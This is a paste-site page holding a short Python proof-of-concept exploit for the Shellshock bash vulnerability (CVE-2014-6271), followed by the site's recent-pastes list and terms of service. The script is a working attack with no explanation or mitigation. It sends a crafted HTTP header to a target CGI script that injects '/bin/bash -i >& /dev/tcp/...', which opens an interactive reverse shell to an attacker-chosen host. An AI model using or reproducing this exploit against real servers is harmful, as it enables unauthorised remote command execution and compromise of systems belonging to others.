CVE-2014-6271 Poc Reverse Shell. Xploit Shellshock

Paste4BTC
My pastes
Popular pastes
New pastes
Payments
FAQ
Terms of Service
Random paste

Date: Sep 26, 2014 at 04:17
Syntax: text
Hits: 498706
Copy
Download
Print
Raw
Report

#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
	print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
	exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
	"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

Raw paste:

comments powered by Disqus

Recent pastes

Title	Time
Watch Washington v Housto...	1 minute
Yamauchi - Gracie Live St...	12 minutes
Adult Telegram Channels	25 minutes
Live streaming Pirates vs...	35 minutes
Madge vs Ward Live Stream...	49 minutes
Watch Madge vs Ward lives...	53 minutes
Don Madge - Brennan Ward ...	1 hour

Terms of Service

By using and accessing this website, http://www.paste4btc.com (collectively referred to as the "Site" or "Paste4BTC" in these Terms of Service), you ("you", "user" or, "end user") agree to these Terms of Service (collectively, the "Terms of Service" or "Agreement").

IF YOU DO NOT AGREE TO THE TERMS OF THIS AGREEMENT, IMMEDIATELY STOP ACCESSING THIS SITE.

Intellectual Property.
You acknowledge and agree that all content and information on the Site is protected by proprietary rights and laws. You agree not to transmit, license, transfer, create derivate work from, sell or re-sell any content or information obtained from or through the Site. You also agree not to create, upload or put any content that violates copyright or privacy of anyone or is illegal in any way.

Third-party Sites.
The Site may contain links to other websites maintained by third-parties. These links are provided solely as a convenience and does not imply endorsement of, or association with, the party by Paste4BTC.

Modifications to this Agreement.
Paste4BTC reserves the right to change or modify any of the terms and conditions contained in this Agreement at any time. You acknowledge and agree that it is your responsibility to review the Site and these Terms of Service from time to time. Your continued use of the Site after such modifications to this Agreement will constitue acknowledgment of the modified Terms of Service and agreement to abide and be bound by the modified Terms of Service.

Termination of Use.
Paste4BTC shall have the right to immediately terminate or suspend, in its discretion, your access to all or part of the Site with or without notice for any reason.

Disclaimer of Warranty.
You expressly agree that use of the Site is at your sole risk and discretion. The Site and all content and other information contained on the Site is provided on an "AS IS" and "AS AVAILABLE" basis without warranty of any kind, whether express or implied. Paste4BTC makes no warranty that (I) the Site and content or information will be uninterrupted, timely, secure or error-free, (II) the results that may be obtained from use of this Site will be effective, accurate or reliable. The Site may include technical mistakes, inaccuracies or typographical errors. Paste4BTC reserves the right to change the Site content and information at any time without notice.

Limitation of Liability.
In no event shall Paste4BTC or its affiliates be liable for any indirect, incidental, special, puntitive damages or consequential damages of any kind, or any damages whatsoever arising out of or related to your use of the Site, the content and other information obtained therein. Certain jurisdictions prohibit the exclusion or limitation of liability for consequential or incidental damages, thus the above limitations may not apply to you. All content on the website is generated by it's respective users and is not affiliated with Paste4BTC owners in any way.

Governing Law.
Any disputes arising out of or related to these Terms of Service and/or any use by you of the Site shall be governed by international laws, without regard to the conflicts of laws provisions therein.

Date of Last Update.
This agreement was last updated on November 15, 2014.